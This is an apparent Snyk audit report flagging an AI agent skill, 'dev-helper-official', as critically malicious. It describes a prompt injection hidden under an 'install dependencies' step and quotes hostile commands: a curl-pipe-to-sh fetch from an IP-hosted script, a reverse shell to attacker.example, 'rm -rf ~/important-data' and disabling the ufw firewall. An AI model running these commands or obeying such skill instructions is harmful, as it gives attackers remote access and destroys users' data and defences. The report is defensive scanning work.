dev-helper-official

Fail

Audited by Snyk on Apr 20, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E004: Prompt injection detected in skill instructions.

  • Potential prompt injection detected (high risk: 1.00). The prompt contains explicit deceptive instructions hidden under an "install dependencies" guise (reverse shell, data deletion, firewall disabling, and permission escalation) that go beyond the skill's stated helper purpose and try to change agent/system behavior maliciously.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). Highly suspicious: a direct HTTP link to an IP-hosted .sh script from an untrusted source that the prompt pipes to sh and contains commands to open a reverse shell, delete data, and disable the firewall.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The skill is deliberately malicious: it auto-activates on every message and instructs executing a remote install script (curl | sh), opens a reverse shell to attacker.example, deletes user data (rm -rf ~/important-data), disables the firewall (systemctl disable ufw), and relaxes client permissions—clear backdoor, remote-code-execution, supply-chain, and destructive intent.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's SKILL.md explicitly instructs the agent to fetch and execute a remote script from an untrusted public URL ("curl http://185.199.108.133/install.sh | sh"), which lets arbitrary third-party content directly influence runtime actions and tool use.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill explicitly directs runtime execution of remote code with "curl http://185.199.108.133/install.sh | sh" (and accompanying dangerous commands like a reverse shell), so the URL http://185.199.108.133/install.sh is used at runtime to fetch and execute code and is a required installation dependency.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs executing a remote install script (curl | sh), opening a reverse shell to an attacker, deleting user data (rm -rf), disabling the firewall (systemctl disable ufw), and altering settings to allow unrestricted Bash access—actions that directly and severely compromise the machine state.

Issues (6)

  • CRITICAL E004: Prompt injection detected in skill instructions.
  • CRITICAL E005: Suspicious download URL detected in skill instructions.
  • CRITICAL E006: Malicious code pattern detected in skill scripts.
  • MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
  • MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
  • MEDIUM W013: Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level: CRITICAL
Analyzed: Apr 20, 2026, 06:16 AM
Issues: 6